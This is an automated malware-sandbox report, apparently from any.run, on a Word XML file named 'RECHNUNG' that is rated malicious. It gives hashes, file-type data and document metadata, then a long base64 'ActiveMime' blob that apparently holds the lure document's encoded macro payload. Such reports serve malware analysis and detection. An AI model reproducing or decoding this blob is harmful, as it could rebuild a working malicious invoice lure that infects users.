download: | RECHNUNG |
Full analysis: | https://app.any.run/tasks/2d47bcd7-f3bc-4ca3-ac13-7b5e20828237 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 11:44:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 8382F58B07748E1674762BC4377DC202 |
SHA1: | DF2B04B8A8F3D98D468387326D7A6A4ABA4AA0D5 |
SHA256: | C324B8597CA11A5FAD5FD5D292F01E9DD5C88FAA7094A366E089B92684268808 |
SSDEEP: | 3072:vh5eJ/zUa+Dl0SiNKDzaJFUKc0UTE7yZRUV7RJeOzi8O:vhQJ/zUa++REDzYUTE7yZRVUi8O |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 111550 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00843CA7 |
WordDocumentBodySectPRsidRDefault: | 001C0641 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 001C0641 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | 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 